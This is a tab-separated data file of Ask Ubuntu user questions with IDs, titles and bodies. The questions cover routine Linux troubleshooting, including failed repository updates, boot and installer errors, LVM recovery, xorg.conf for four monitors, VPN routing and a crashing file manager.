394822	err http : //ppa.launchpad.net raring/main amd64 packages	sudo apt-get update : translation-en fetched 973 kb in 33s ( 28,8 kb/s ) w : failed to fetch http : //ppa.launchpad.net/network-manager/ppa/ubuntu/dists/raring/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/network-manager/ppa/ubuntu/dists/raring/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . how do i fix that ? i ca n't post the entire output here because i do n't have 10 points .
394825	installing ubuntu 12.04lts on wd hard-drive : \ubuntu\winboot\wubildr.mbr missing error ?	i 've tried installing ubuntu on my 1tb wd hard-drive . i 've done this using easybcd , and on a windows 7 pc . problem is , after restarting my pc ( and booting from the g : \ hard-drive ) , i get this error : \ubuntu\winboot\wubildr.mbr i checked the g : \ubuntu\winboot\wubildr.mbr and the file exists . i 've searched around for hours and the problem still persists . i ca n't understand what the solution is . how to fix this ? p.s . i 'm a beginner in ubuntu , though i have used it as a production server and desktop environment for a week .
394826	how to make sure my keys are recording to do some action ?	is there any way i can make sure that , what ever the keys i am pressing for some shortcut are sending properly & later i can know them if i want ? i will explain , for example take a case as i would like to open my terminal so pressing ctrl+alt+t can do opening a terminal for me . so my question is how can i know , by pressing which keys that has terminal opened at that time ? you can consider my question as some log related issue too .
394828	accidentally deleted 'sudo '	i accidentally deleted the /usr/bin/sudo file . how can i restore it ? i have found a thread on ubuntuforums , but it seems to be not solved .
394831	how to reinstall ubuntu on windows 8	i have an asus k56cm which i installed ubuntu 12.04 on , but it kept freezing so i upgraded to 14.04 but somewhere during the install the driver for my nvidia graphics card was corrupted and now when i boot to ubuntu i get a black screen with a flashing cursor . i have tried to boot from a usb to do a fresh install of 13.10 but i cant seem to get it to work . i have formatted the usb with uui and hold f12 on boot like before but it does n't work . what am i doing wrong ? also when i start up my device i still have the option to boot windows 8 which runs fine . i have tried refreshing and reinstalling windows 8 so i can start over but it says i am missing an important partition or do not have the permissions to do this . what is the best way to get my device running on ubuntu again ? thank you for all your help .
394832	run ubuntu off hard-drive without booting from startup ?	is there a way to run ubuntu off an external hard-drive ( such as a usb ) , without booting it from startup ? in other words , one simply plugs it in and runs the usb . then , ubuntu starts up . no need to boot it from startup . i understand you can use a vm , but i 'm looking for a full installation expereince .
394833	why my monitor never shuts down when on the logging screen ( ubuntu 13.10 ) ?	why my monitor never shuts down when on the logging screen ( ubuntu 13.10 ) ? this problem arrived after the 13.04 to 13.10 upgrade . since then , i did a fresh install of ubuntu 13.10 and the problem is still present . this is a bad situation for my electricity bill and my monitor . is there a easy way to fix this ? thanks ... .
394840	touchpad problem and cursor vibrating continuously in lenovo z570 laptop	i am using a lenovo z570 model . i have installed ubuntu through usb stick by making it bootable but now i have problem with the touchpad and my cursor is vibrating continuously .
394841	g++ ( 4.6.1 ) does not recognize -std=c++11	i 'm trying to compiling a program ( via make ) using g++ 4.6.1 with flag -std=c++11 . it 's giving me : cc1plus : error : unrecognized command line option â-std=c++11â this is running on ubuntu 11.04 natty . ( the same program compiles smoothly on mac os ) here 's my g++ : using built-in specs . collect_gcc=g++ collect_lto_wrapper=/usr/lib/i386-linux-gnu/gcc/i686-linux-gnu/4.6.1/lto-wrapper target : i686-linux-gnu configured with : ../src/configure -v -- with-pkgversion='ubuntu 4.6.0-3~ppa1 ' -- with-bugurl=file : ///usr/share/doc/gcc-4.6/readme.bugs -- enable-languages=c , c++ , fortran , objc , obj-c++ , go -- prefix=/usr -- program-suffix=-4.6 -- enable-shared -- enable-multiarch -- with-multiarch-defaults=i386-linux-gnu -- enable-linker-build-id -- with-system-zlib -- libexecdir=/usr/lib/i386-linux-gnu -- without-included-gettext -- enable-threads=posix -- with-gxx-include-dir=/usr/include/c++/4.6 -- libdir=/usr/lib/i386-linux-gnu -- enable-nls -- with-sysroot=/ -- enable-clocale=gnu -- enable-libstdcxx-debug -- enable-libstdcxx-time=yes -- enable-plugin -- enable-objc-gc -- enable-targets=all -- disable-werror -- with-arch-32=i686 -- with-tune=generic -- enable-checking=release -- build=i686-linux-gnu -- host=i686-linux-gnu -- target=i686-linux-gnu thread model : posix gcc version 4.6.1 20110409 ( prerelease ) ( ubuntu 4.6.0-3~ppa1 )
394844	updating to the latest alsa release	i would like to have the latest stable/dev release of alsa . can i do this via ppa ? so , i need a solution for stable versions and another one for latest releases , even they are unstable .
394846	how can i get the installed alsa version ?	how can i see what alsa version is installed on my machine ? i tried : $ alsa -- version usage : /sbin/alsa { unload|reload|force-unload|force-reload|suspend|resume }
394847	blank screen in ubuntu 13.10 after login ; missing opengl	i had aworking ubuntu 13.10 on my laptop till yesterday when i installed opencv 2.4 . it did not cause any immediate problem yesterday but when i turned on the power this morning , i did not get a desktop after i logged in . i do get the login screen fine with my appropriate background . i went into text mode using ctrl-alt-f1 and logged in . when i did startxit went on for a while and got stuck at loading extension glx . i typed the command unity which gave me an error compiz ( core ) - error : plugin 'opengl ' not loaded . i have looked at other posts and even reinstalled xserver-xorg-video-intel but no luck . can someone please help ?
394848	use pcmanfm shortcuts in download menus	i 'm using lubuntu with pcmanfm as my file manager , and i ca n't get over this irritation . i configure shortcuts in the sidebar , because i like deep hierarchies , but when a download prompts a save dialog in chromium , i have a barebones , unconfigured pcmanfm come up . why is this ? how can i fix this ?
394849	replace multiple files with 1 new file	how do i replace a file called config.dat on multiple files across multiple directories ? example : /var/www/site1/configs/config.dat /var/www/site2/configs/config.dat /var/www/site3/configs/config.dat i want to replace all config.data with my new /home/john/config.dat . thanks in advance .
394850	how i can bind keys for selecting language directly in lubuntu 13.10 ?	i like to change keyboard bindings directly to language that i want to use . i use the following keyboard bindings to change keyboard layout in os windows7 : ctrl+1 for russian , ctrl+2 for polish , ctrl+3 for french , ctrl+4 for ukrainian . how i can configure lubuntu 13.10 for doing the same ? i 've found how to change keyboard layout choosing languages cyclically ( alt+shift , for example ) , but like to select needed language layout directly using specific combination of keys for each language . cltr+5 for lithuanian etc . direct language selection is possible in windows 7 , may be it is possible also in lubuntu ?
394853	bring back unity button ?	this is probably going to sound really strange but i was probably one of the few people who did n't have issues with ubuntu 11.04 's unity . it ran great for me , it was super fast , and i thought it looked superb . i 've already done a little bit of googling and apparently it 's impossible to install an old version of unity , so i was wondering if there was any form of hack to at least bring back the old styling of it ( an actual menu bar button instead of the dock icon ) in theory i could just use the older version ( which is what i 'd love to do , i loved natty . plus it 's some nostalgia as it was my first version of ubuntu ) but then i 'd be missing out on alot of different updates/less security , etc . is it possible to at least bring back this button ? ps : the `` newer version '' would probably be either 12.04 lts or 13.04/13.10
394854	can not access mysql in 13.10	i have recently installed an completely new version of 13.10 and installed the mysql server from the software center . when i try to run mysql -u root -p i keep getting `` access denied '' . i have asked about this on the community forum and they say i should have been prompted to enter the root password when i installed the mysql-server package . but i was not prompted for anything during the install . i have purged the mysql-server and re-installed several times all with the same effect . can anyone help me out ?
394856	ubuntu ca n't see my 32gb ntfs thumb drive	nothing happens , when plugged . blkid does n't see it either . no luck with disks as well . it 's like it is n't there at all . the thumb drive shows up just fine under windows computers . the ubuntu computer finds just fine other ( smaller and fat16 drives ) so , is it the size , is it the file system or maybe the fact that ubuntu runs on macbook pro ?
394858	ralink wireless card driver rt5390sta issues	i like many others had issues with my ralink drivers on ubuntu . i followed the post here : ubuntu 13.04 ralink rt5390 wo n't work after upgrade , the driver builds and inserts just fine , but i have odd issues with the installation . there are now two wireless tray icons with different options underneath each . when i attempt to connect to a specific secured network , if i have ever connected before , i am presented with a dialogue box to connect to the network , with the options connect , cancel , cancel , okay . clicking anything but the second cancel will cause the box to pop up four times before disconnecting . clicking the second cancel will cause the boxes to stop popping up but connecting will hang . in order to reconnect i need to delete the connection , reboot , and then connect again , resetting the encryption protocols and password . editing the connection afterwards is not possible ; the options screen from the `` edit connections ... '' option is entirely different than an unsecured wireless access point and completely greyed out . i know this is kind of a long shot but help would be greatly appreciated . i can post whatever settings needed . i noticed a lot of references to patches contained at https : //build.opensuse.org/package/files ? package=rt5390sta & project=driver % 3awireless , but that leads me to a white page , so if anyone has those patches i 'd love to give that a shot as well .
394867	loading kernel and exactly how to fix it	bear with me everyone , i am fairly new to the entire thing . but i seriously need something explained to me . i downloaded ubuntu 13 , for my alienware with windows 8 , the newest version . when i try to install the program , it only says that i need to load the kernel first . how exactly do i go about that , because i am almost completely lost . any help would be appreciated . thank you .
394874	how to undo sudo chmod ugo+wx /	i think i followed bad advice and did sudo chmod ugo+wx / this was supposed to give me write permissions to my secondary ext4 storage partition but i think i did it for the system partition ? so did i just give myself write and execute permissions outside of home as well ? i bet that 's terrible for security ? please let me know what i did , how to undo it , and how to do it for the data partition instead : ) thank you !
394876	accessing the internet over a vpn	i have a vpn connection from my laptop ( the client ) running xbuntu to my windows pc ( the server ) running win7 . i can connect the vpn and access ip addresses on the remote windows network just fine from the laptop , through the vpn . what i ca n't do is access the internet from the laptop while the vpn tunnel is connected . i would like all the internet traffic to route through the vpn , so in effect the laptop is behaving only as if it is part of the remote windows network , so i do n't want split tunnelling or anything like that . if i were running windows on the client i would tick the box marked 'use remote gateway ' and my goal would be achieved , but i ca n't find the equivalent in xbuntu . from internet searches i think i need to set up a route , but i ca n't find the scenario that quite matches my requirements , or work out how to do it . how can i do it ?
394880	how to build and add a new kernel in ubuntu 12.04 ?	how to build and add a new kernel in ubuntu 12.04.. folling step are done : linux.3.12.2 a tar file downloaded form kernel.org , unpaking , make clean , make menuconfig , make bzimage and copied bzimage to /boot/vmlinuz and rebooted . but when i type uname -r , its showing old kernel only . plz help .
394883	autogenerate javascript from mysql	i have a site where i can upload images with some info ( startdate , enddate , duration , url ) i want to make a slideshow that choose those pictures that is > $ startdate & & < $ enddate . and i want each picture to be displayed as long as i 've set it to in the value $ duration . my javascript so far is like this : < script src= '' http : //code.jquery.com/jquery-latest.min.js '' > < /script > < script > function showpic1 ( ) { $ ( ' # test ' ) .html ( `` < img src=\ '' $ url '' width= '' 400 `` height= '' 300 `` > '' ) ; settimeout ( showpic2 , $ dur ) ; } function showpic2 ( ) { $ ( ' # test ' ) .html ( `` < img src=\ '' $ url '' width= '' 400 `` height= '' 300 `` > '' ) ; settimeout ( showpic1 , 9000 ) ; } showpic1 ( ) ; < /script > < div id= '' test '' > < img src='http : //haga.mizgalski.se/upload/upload/bild1.jpg ' width='400 ' height='300 ' > < /div > pretty simple.. but how can i autogenerate this javascriptcode with exemple bash-script from a database ? ! any idăšas ?
394888	write script to open browser at specific url on login ?	i 've been using ubuntu for a few weeks , and i want to know more about automating tasks . how can i write a bash script to open a web browser with a specific url after startup ?
394889	find directory and delete it 's content but not itself	how do i find a directory and delete all it 's content but not the directory itself ? find -type -d -name 'tmp ' -exec rm -rf { } \ ; but this also deletes 'tmp ' directory . thanks in advance .
394897	double-click on .sh file to open terminal and execute series of commands in it ?	i 'm trying to double click on a file that does this : # ! /bin/bash # mount usb jump , copy files to it , unmount it . [ open terminal ( so that i can see what 's going on ) ] pmount /dev/sdc jump sleep 2s cp -p -u source/path/ destination/path/ read -p `` press enter to unmount jump or ctrl c to abort . '' pumount /dev/sdc [ close terminal ] the two lines i do n't know how to write are [ open terminal ] and [ close terminal ] anyone knows how to do this ? edit : many thanks folks , i bundled your input together and eventually got there . i double-click on the .sh file that says : 'terminal -hold -e /path/to/jumpbkp.sh ' and it opens a terminal and gives me the whole rundown onscreen . it was cool to receive so much input in so little time . many thanks again . 2nd edit : i 've come up with an option that makes it even sweeter . i post it in case anyone bumps into this thread . terminal -hold -e bash '/path/to/jumpbkp.sh' the 'bash ' spares me of that darn : `` warning : could not find '/path/to/file.sh ' , starting '/bin/bash ' instead . please check your profile settings . '' cheerio !
394898	usb partition problem	so i had a usb drive that i used to install ubuntu here and there . it started having problems a little while ago . now its like this : usb partitions when i try to erase a partition i get this error . what can i do to solve it ? i never did any partitioning on my own . sorry i can not post pictures till i have 10 reputation so i used links !
394902	external hdd auto shut down ?	unlike windows 7 my external western digital hard disk [ with separate power input ] does not power off automatically when i press shut down . what can i do for that ? i use ubuntu 12.04 lts and i 'm a new user .
394904	about repository	my repository can not be updated some item , please help me w : failed to fetch http : //ppa.launchpad.net/elementary-br/projects/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/elementary-br/projects/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? you see ?
394905	need help with xorg.conf for dual radeon hd6450 video cards with 4 monitors	i am running 64-bit ubuntu 13.10 with unity and have dual ( 2 ) radeon hd6450 video cards and 4 hanns-g hl273 monitors . each radeon card is driving one monitor via dvi and the other via vga . i am running the proprietary video drivers from amd 's web site : `` amd-catalyst-13.11-beta v9.4-linux-x86.x86_64.run '' i tried to use `` amd-catalyst-13.12-linux-x86.x86_64.run '' but could not get that newer version to install . what i need help with is how to `` correct '' my xorg.conf file and any other needed instructions to get all four of my monitors to work as a continuous desktop that allows me to drag things from one monitor to the next , etc . when i tried to use the default open source drivers that came in ubuntu 13.10 , only three of the monitors would work . now that i am running the proprietary ones , all four monitors come on and i can move my mouse from one end to the other -- but only the right-most monitor displays my desktop and allows me to `` do anything '' . any time i move my mouse to any of the other three monitors ( which display all-white ) , it turns into an `` x '' and does not do anything else but move . enabling xinerama makes all four displays go all-black after login . i do have amdcccle installed , but it does not seem to have the ability to handle my particular configuration . my current xorg.conf : section `` serverlayout '' identifier `` basic layout '' screen 0 `` screen1 '' 5760 0 screen 1 `` screen0 '' 0 0 screen 2 `` screen2 '' 3840 0 screen 3 `` screen3 '' 1920 0 endsection section `` module '' endsection section `` monitor '' identifier `` 0-dfp2 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1080 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` 0-crt1 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1080 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` 1-dfp2 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1080 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` 1-crt1 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1080 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` device '' identifier `` device0 '' driver `` fglrx '' option `` monitor-crt1 '' `` 1-crt1 '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` device1 '' driver `` fglrx '' option `` monitor-dfp2 '' `` 0-dfp2 '' busid `` pci:4:0:0 '' endsection section `` device '' identifier `` device2 '' driver `` fglrx '' option `` monitor-dfp2 '' `` 1-dfp2 '' busid `` pci:1:0:0 '' screen 1 endsection section `` device '' identifier `` device3 '' driver `` fglrx '' option `` monitor-crt1 '' `` 0-crt1 '' busid `` pci:4:0:0 '' screen 1 endsection section `` screen '' identifier `` screen0 '' device `` device0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` device2 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen3 '' device `` device3 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection
394908	lvm volume not accesible after accidental drive removal , now lv status is suspended	i have a home server with a pool of 3 drives , and the os installed in a thumb drive , this thumb drive had physical errors and i had to reinstall the os , the lvm pool was working well after thumb drive crash , but i accidentally selected one of the drives to manually install grub and things went wrong . i do n't know how/why this drive got detached from the pool and lv stopped working . i 've trying for months and have followed different guides and instructions , i partially restored the pool , but it is still not working . the only clue that i have now for the reason of the error is : lvdisplay -m -- - logical volume -- - lv path /dev/data/shared lv name shared vg name data lv uuid wfdvye-pga2-dyun-d2gd-l0xs-kbee-x2ppzp lv write access read/write lv creation host , time , lv status suspended # open 0 lv size 6.37 tib current le 1669260 segments 3 allocation inherit read ahead sectors auto - currently set to 256 block device 252:0 -- - segments -- - logical extent 0 to 476931 : type linear physical volume /dev/sdb1 physical extents 0 to 476931 logical extent 476932 to 953863 : type linear physical volume /dev/sda1 physical extents 0 to 476931 logical extent 953864 to 1669259 : type linear physical volume /dev/sdc physical extents 0 to 715395 pvdisplay -- - physical volume -- - pv name /dev/sdb1 vg name data pv size 1.82 tib / not usable 1.09 mib allocatable yes ( but full ) pe size 4.00 mib total pe 476932 free pe 0 allocated pe 476932 pv uuid kcszc0-tgcn-ga33-w27c-j4mp-jekh-btqdkr -- - physical volume -- - pv name /dev/sda1 vg name data pv size 1.82 tib / not usable 1.09 mib allocatable yes ( but full ) pe size 4.00 mib total pe 476932 free pe 0 allocated pe 476932 pv uuid 0gzjv2-irwc-r5z3-vpeb-huzc-eyao-liu2zt -- - physical volume -- - pv name /dev/sdc vg name data pv size 2.73 tib / not usable 472.00 kib allocatable yes pe size 4.00 mib total pe 715397 free pe 1 allocated pe 715396 pv uuid yicf5n-xb8y-f3gl-kfum-stxz-gpmv-0e8mie `` /dev/sdd5 '' is a new physical volume of `` 1.82 tib '' -- - new physical volume -- - pv name /dev/sdd5 vg name pv size 1.82 tib allocatable no pe size 0 total pe 0 free pe 0 allocated pe 0 pv uuid lmj6vd-lhs5-0bvb-mqzb-gbbc-8drx-m74apj note : the 4th drive sdd5 was never part of the lvm data pool , and have no data . sudo fdisk -l disk /dev/sda : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd53b391a device boot start end blocks id system /dev/sda1 1 3907029167 1953514583+ 8e linux lvm disk /dev/sdc : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x6b4f5902 device boot start end blocks id system disk /dev/sdd : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00081354 device boot start end blocks id system /dev/sdd1 2048 499711 248832 83 linux /dev/sdd2 501758 3907028991 1953263617 5 extended partition 2 does not start on physical sector boundary . /dev/sdd5 501760 3907028991 1953263616 8e linux lvm disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x19e4252c device boot start end blocks id system /dev/sdb1 2048 3902855167 1951426560 8e linux lvm /dev/sdb2 3902857214 3907028991 2085889 5 extended /dev/sdb5 3902857216 3907028991 2085888 8e linux lvm disk /dev/sde : 16.1 gb , 16097738752 bytes 64 heads , 32 sectors/track , 15352 cylinders , total 31440896 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000cad44 device boot start end blocks id system /dev/sde1 2046 6125567 3061761 5 extended /dev/sde2 * 6125568 31438847 12656640 83 linux /dev/sde5 2048 1953791 975872 83 linux /dev/sde6 1955840 6125567 2084864 82 linux swap / solaris *note : the 16gb drive is the thumbdrive where os is installed updated result of fdisk -lon jan-20th after execute @ psusi suggestions disk /dev/sda : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd53b391a device boot start end blocks id system /dev/sda1 1 3907029167 1953514583+ 8e linux lvm disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x19e4252c device boot start end blocks id system /dev/sdb1 2048 3907028991 1953513472 83 linux disk /dev/sdc : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x6b4f5902 device boot start end blocks id system disk /dev/sdd : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00081354 device boot start end blocks id system /dev/sdd1 2048 499711 248832 83 linux /dev/sdd2 501758 3907028991 1953263617 5 extended partition 2 does not start on physical sector boundary . /dev/sdd5 501760 3907028991 1953263616 8e linux lvm disk /dev/sde : 16.1 gb , 16097738752 bytes 64 heads , 32 sectors/track , 15352 cylinders , total 31440896 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000cad44 device boot start end blocks id system /dev/sde1 2046 6125567 3061761 5 extended /dev/sde2 * 6125568 31438847 12656640 83 linux /dev/sde5 2048 1953791 975872 83 linux /dev/sde6 1955840 6125567 2084864 82 linux swap / solaris
394912	ubuntuone in kubuntu is not using proxy	i am using kubuntu 13.10 64 bit . i have also installed the ubuntu one . i have installed ubuntuone-control-panel-qt , ububtuone-client-proxy . but ubuntuone is not respecting the kubuntu proxy setting . i have changed the .profile , .bashrc file manually to include the http_proxy , https_proxy , ftp_proxy variables . but still it is not working . but if i connect it in a network where there is no proxy it works .
394915	install ubuntu on a old pc	when i install ubuntu on my old laptop dell inspiron 2200 tells me this kernel requires the following features not present on the cpu pae unable to boot please identify a kernel for your cpu approprieate
394921	installation freezing	every time that i have tried to install ubuntu , it freezes right after i click on the `` install ubuntu '' button . what is causing this issue ? i have tried to install ubuntu 13.10 ( 32 bit ) and 12.04 ( 32 bit ) . they system is trying to run it on is a 2003 hp pavilion with an intel celeron 2.7 ghz and 256 mb of ram . i 've also tried installing lubuntu , the installer starts fine , but as it finished , it tells me the installer has crashed and sends a ticket , but it does n't give me any further information .
394922	i just installed ubuntu 12.04 , but i ca n't connect to wifi	i can connect through ethernet , but not wirelessly . can someone please direct me on what to do or where to get the drivers ? i have an hp pavilion amd quadcore with realtek rtl8188ee 802.11bgn wi-fi adapter . i 've installed all the updates , but it still does n't work . thanks !
394926	ubuntu openstack and what did i miss here ?	i downloaded ubuntu openstack ( it 's the second `` entry '' on the page ) . the download link took me to ubuntu server for cloud ( where the download began ) . i downloaded the latest server package , which is 13.10 . the best i can tell , there 's no cloud stuff on that cd . when i installed the server package , i was asked if i wanted to enable the ssh server , the samba server , install a print server , etc . but there was no choice for `` cloud server '' . additionally , after reboot , there is nothing running that looks like its cloud related , like keystone ( identity management ) , glance ( image manager ) , nova or nuetron ( compute ) , ceph or swift ( object storage ) , etc . i 'm obviously missing something , here , but i do n't know what it is . the advertised steps are : download ubuntu server for cloud create a startup disk usb stick insert it in your computer and reboot start using your local private cloud openstack is moving so fast my recipes for installing it and running it on ubuntu are already ancient . that includes my books like openstack cloud computing cookbook . what , precisely , does ubuntu openstack provide ? am i supposed to do something else next ( apparently , but i do n't know what ) ?
394927	trying to upgrade firefox in 11.04	i 've switched on an old laptop running 11.04 and firefox 4 ! mozilla suggested upgrading to firefox26 . it appears in my downloads folder . i 've tried to extract and open but i ca n't get firefox 26 visible to open/use . update manager does n't seem to help . can anyone steer me with a very simple step-by-step guide to finish the upgrade please . i checked other q & a and people seem to discuss conflicting codes , repositories etc without saying `` click on xyz '' . all help appreciated . thanks in advance .
394929	problem running .jar as excetutable -- i 'm confused	i 'm new here and relatively new to linux . running ubuntu 12.04 on a dell xps m140 . i am trying to run a .jar 'applet ( is that the correct word ? ) . it is a server to use my android as a wireless mouse over wifi . i tried executing it with openjava 6 and 7 , and keep getting this problem ; however it worked fine the first time i ran it ... i right click on the file `` aioserver3.4.2.jar '' and select to open with the java 6/7 runtime . the app appears to open , i see the little icon appear in the status bar/thing at the top with the time , log in and power options , volume ect ( again , idk the word for it ) . i right click the icon and click 'show/hide application ' and where as i used to see the app and use the program , all that appears is this gray and white box in the top left corner of my screen just to right of the launcher . i tried posting a screenshot but i am not able to yet . can anyone help ? why am i not seeing the application ?
394931	my left control key wo n't work properly under gnome 3	i decided to install the gnome 3 desktop environment/shell originally in 12.04 and did n't use it because it was slow . i upgraded to 13.10 and the unity/ubuntu desktop was getting a bit buggy and old for me . i decided to start using the gnome 3 environment , which improved overall performance on my laptop . under unity , all the of the keyboard commands/shortcuts that involve a control key work . under gnome , it 's a lot different . any system/shell based shortcut ( such as open terminal , swap system focus , mouse click modifier , multiple file select , etc ) work with both control keys . any typing based shortcuts will only work with the right control key ( ctrl+c for copy/terminal cancel , ctrl+v , ctrl+shift+v , ctrl+z , etc ) . if i attempt these shortcuts with the left control key , it seems they are completely ignored . i noticed while i was on gnome 3.8 , when my pointer was over a text box it was the standard `` i '' shape . the moment i pressed the left control , it would turn back into the standard pointer until i let go ( no longer visual happens in 3.10 ) . gnome 3.10 ( now released as stable ) fixed more bugs on ubuntu , and i noticed improved the left control functionality , but the typing shortcuts still do n't work . also to note , but i do n't know if this is related , i notice that when playing minecraft on fullscreen , pressing left control kicks me out of fullscreen . this is similar to as if i tried to adjust the laptop 's volume and brightness while fullscreen ( although this also happens in unity/ubuntu desktop ) . i would prefer to still use the gnome desktop , but without full use of the left control key , it 's sorta awkward having to use the right control key for normal uses .
394939	ca n't boot or find windows 7 after installing ubuntu 13.04	after installing ubuntu 13.04 alongside with windndows 7 , my laptop restarted and keep asking me to install ubuntu ( i have done that ) . moreover , i cant access or boot my windows 7 anymore . i tried boot repair but it could n't help as well .
394944	problem with routing using shrew soft vpn	ran into a little bit of a trouble with the shrew vpn . when i try to connect over vpn , i get ridiculously low speed ( 0.3k / sec ) under ubuntu . i tried this under windows and all is perfect in the world . digging through the various questions around the net , i tried pretty much everything out there but still nothing . my routes look really weird though : ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.100.252 0.0.0.0 ug 0 0 0 tap0 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 82.135.112.130 192.168.1.1 255.255.255.255 ugh 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 192.168.100.0 0.0.0.0 255.255.255.0 u 0 0 0 tap0 any clue ?
394945	why does nautilus/unity crash ?	every time i use nautilus and navigate to a specific subdirectory inside my home directory , nautilus instantly closes , and the desktop wallpaper disappears too . the computer appears to continue just fine apart from this glitch , but i am never able to open that subdirectory . i can use a terminal and ls -al in the subdirectory and i do n't see anything obviously wrong to a newbie 's eye . there are around 30 files in there , total maybe 200kb , mostly plaintext log files plus a few php files . i 've also just rebooted into recovery mode and ran the fsck option , just to make sure there 's nothing corrupt going on , but it did n't resolve the problem . i still think that there 's some kind of file corruption going on , but i have run out of ideas . this is a fully updated version of plain ubuntu 13.10 without any memorable hacks or customizations ( apart from moving /home to a 1tb drive while ubuntu runs off of an ssd ) . the physical computer is almost new and has lots of memory ; i do n't think it 's in any way hardware-related . how can i troubleshoot a faulty subdirectory ?
394947	install ubuntu 13.10 on windows 8	i have tried several times in different ways by dvd by usb and by windows installer to install ubuntu 13.10 or the 12 version . everytime it does not work the screen says that a file is missing i believe is boot manager file or something and gives an error code . what could be the problem ?
394949	remove nvidia settings	after deleting the .nvidia folder on my home i can not login . after login a black screen appear and after return the login screen . i remove also all nvidia application except nvidia-304-update and nvidia-304-updates . someone can help me , please .
394950	the system is running in low-graphics mode error and problem logging in	my pc has a dual boot with windows 7 and ubuntu 12.04 . when i start ubuntu , i get this error message : the system is running in low-graphics mode as in this link . i did as in the topic , but i ca n't login with my account . when i press ctrl+alt+f1 , i type my login and password , and it asks me again , even it 's correct .
394953	mount nfs as block device for enhanceio caching	at this moment i have vmdks stored on nfs server ( mdraid + enhanceio caching on ssd ) and client pcs use those vms though nfs mount . this work good , but i want to accelerate things by adding local cache on ssds installed on client pcs . enhanceio is working against block devices , so it seems there is no way to cache read operations for nfs mounts . i 've found in google at blogs.oracle.com is there any way to export nfs mount as block device so i could enable enhanceio caching over it ? is there any similar technique for ubuntu ? or could you suggest any other way to implement this task ?
